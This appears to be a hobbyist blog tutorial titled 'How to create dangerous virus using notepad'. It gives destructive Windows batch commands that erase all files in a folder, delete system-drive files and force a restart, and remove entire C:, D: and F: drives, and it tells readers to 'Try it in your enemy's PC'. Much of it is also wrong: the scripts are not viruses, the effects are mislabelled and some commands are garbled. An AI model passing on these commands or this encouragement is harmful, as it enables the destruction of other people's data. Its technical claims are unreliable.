TECH TUTORIAL PART(1) :- How to create dangerous virus using notepad.

How to create dangerous virus using notepad.

Fully Graphical Deeply Explained Tutorial

Powered by: Original Production Ltd.



What is virus?

A computer virus is a program or piece of code that is 
loaded onto your computer without your knowledge and 
runs against your wishes. Viruses can also replicate 
themselves. All computer viruses are man-made.




STARTING TUTORIAL
    
Open notepad and type the code which is shown below.

Don’t worry nothing will happen dangerous in your  system. You will learn something new.



Virus : How to Delete all your system files

Delete files with a small command!!

Copy the following code into your notepad and save it as a virus.bat file

@echo off

del *.*

All your files in your hard disk will erase in less than 4mins.

It will look like this.


Virus : The blue screen of death. [Dangerous]

Copy the following code in notepad which is shown in below

@echo off

Del %systemdrive%.*/f/s/q

Shutdown –r-f-t 00

Please save it as [virus2.vbs] and run

NOTE:-Don’t try it in your own computer because I told you already about this virus[it might be dangerous.]

Try it in your enemy's PC.

This code look like this in noteped.



Virus: Format C,D,E drives in less than 3seconds.

Type or copy the following code in your notepad.

rd/s/q D:

rd/s/q C:

rd/s/q F:

save it as (deletdrive.bat)and run it.

NOTE:It virus will format your PC less than 3s.[too dangerous try at your own risk]



Virus : MATRIX EFFECT [NOT HARMFUL]

Type or copy the following code in notepad.

@echo off

Color 02

:tricks

Echo 

%random%%random%%random%%random%%random%%random%%random%%random%

goto tricks

save it as(matrix.bat) and run.


I think this tutorial will help you to create some pretty and dangerous virus.We will talk in next tutorial of awesome tech subject.

Tutorial Ends......

                                                                                                                                                  



GOOD BYE..

HAVE A NICE DAY..

KEEP VISITING...


*****MOHIT VARMA*****

Labels: , , , , , ,